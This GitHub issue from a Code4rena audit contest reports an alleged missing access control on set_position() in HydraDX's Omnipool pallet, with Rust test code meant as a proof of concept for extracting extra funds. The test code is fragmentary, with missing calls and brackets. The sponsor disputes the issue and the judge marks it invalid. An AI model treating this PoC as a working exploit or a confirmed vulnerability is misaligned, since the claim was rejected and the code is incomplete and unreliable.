code-423n4 / 2024-02-hydradx-findings

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No access control on set_position() public function in Omnipool contract can lead to user gaining more funds #123

Closed c4-bot-2 closed 6 months ago

c4-bot-2 commented 6 months ago

Lines of code

Vulnerability details


In the omnipool/src/ , the set_position() function is a public function defined in a Pallet implementation. Since this function is clearly marked public, it can be called outside the pallet. Hence any user or smart contract within the runtime can make a call to set_position() and insert or update position with arbitrary position data.

The function inserts or updates position with given position data.

With a combination of other vulnerable functions, a malicious user can manipulate the state of their position to their advantage to receive more funds in a remove_liquidity call.

Proof of Concept

In the PoC below, for a normal transaction, LP1 is expected to have a balance of 4840 tokens of the registered asset, and 203.921568627449 amount of LRNA

fn normal_transaction_without_manipulation() {
            (Omnipool::protocol_account(), DAI, 1000 * ONE),
            (Omnipool::protocol_account(), HDX, NATIVE_AMOUNT),
            (LP3, 1_000, 100 * ONE),
            (LP1, 1_000, 5000 * ONE),
            (LP2, DAI, 50000 * ONE),
        .with_initial_pool(FixedU128::from_float(0.5), FixedU128::from(1))
        .with_token(1_000, FixedU128::from_float(0.65), LP3, 100 * ONE)
        .execute_with(|| {
            let liq_added = 400 * ONE;

            let current_position_id = <NextPositionId<Test>>::get();

            assert_ok!(Omnipool::add_liquidity(RuntimeOrigin::signed(LP1), 1_000, liq_added));

                200 * ONE,
                500000 * ONE

            assert_balance!(Omnipool::protocol_account(), 1000, 300 * ONE);
            let expected_state = AssetReserveState {
                reserve: 300 * ONE,
                hub_reserve: 541666666666667,
                shares: 500000000000000,
                protocol_shares: Balance::zero(),
                cap: DEFAULT_WEIGHT_CAP,
                tradable: Tradability::default(),
            assert_asset_state!(1_000, expected_state);

            assert_balance!(Omnipool::protocol_account(), 1000, 60 * ONE);
            assert_balance!(LP1, 1000, 4_840_000_000_000_000);
            assert_balance!(LP1, LRNA, 203_921_568_627_449);

            assert_pool_state!(10391666666666667, 64723183391003641, SimpleImbalance::default());

but when the LP1 calls Omnipool::set_position() function with the arbritary position data, the balance of the registered token for LP1 user will be 4900 amount of tokens and 222.852003235832 amount of LRNA token

fn set_position_called_by_any_user_to_get_more_funds() {
            (Omnipool::protocol_account(), DAI, 1000 * ONE),
            (Omnipool::protocol_account(), HDX, NATIVE_AMOUNT),
            (LP3, 1_000, 100 * ONE),
            (LP1, 1_000, 5000 * ONE),
            (LP2, DAI, 50000 * ONE),
        .with_initial_pool(FixedU128::from_float(0.5), FixedU128::from(1))
        .with_token(1_000, FixedU128::from_float(0.65), LP3, 100 * ONE)
        .execute_with(|| {
            let liq_added = 400 * ONE;

            let current_position_id = <NextPositionId<Test>>::get();

            assert_ok!(Omnipool::add_liquidity(RuntimeOrigin::signed(LP1), 1_000, liq_added));
            // assert_ok!(Omnipool::add_liquidity(RuntimeOrigin::signed(LP3), 1_000, liq_added));

                200 * ONE,
                500000 * ONE

            assert_balance!(Omnipool::protocol_account(), 1000, 300 * ONE);
            let expected_state = AssetReserveState {
                reserve: 300 * ONE,
                hub_reserve: 541666666666667,
                shares: 500000000000000,
                protocol_shares: Balance::zero(),
                cap: DEFAULT_WEIGHT_CAP,
                tradable: Tradability::default(),
            assert_asset_state!(1_000, expected_state);

            let arbitrary_liq_amount = 500 * ONE;

            let lp_position = Position::<Balance, AssetId> {
                asset_id: 1_000,
                amount: arbitrary_liq_amount,
                shares: arbitrary_liq_amount,
                price: (2560 * ONE, 3400 * ONE),


            assert_balance!(Omnipool::protocol_account(), 1000, 0);
            assert_balance!(LP1, 1000, 4_900_000_000_000_000);
            assert_balance!(LP1, LRNA, 222_852_003_235_832);

            assert_pool_state!(10283333333333333, 64048442906574570, SimpleImbalance::default());

This also affects the TVL of the pool.

Tools Used

Manual review

Recommended Mitigation Steps

Add an access control check to ensure the function can only be called by authorized accounts. If function is not necessary, remove it.

Assessed type

Access Control

c4-pre-sort commented 6 months ago

0xRobocop marked the issue as sufficient quality report

c4-pre-sort commented 6 months ago

0xRobocop marked the issue as primary issue

c4-sponsor commented 6 months ago

enthusiastmartin (sponsor) disputed

enthusiastmartin commented 6 months ago

No issue at all. That's how substrate works with public functions.

Why would you bother with this - if you can call Balances::transfer, which is also public function.

OpenCoreCH commented 6 months ago

See #131

c4-judge commented 6 months ago

OpenCoreCH marked the issue as unsatisfactory: Invalid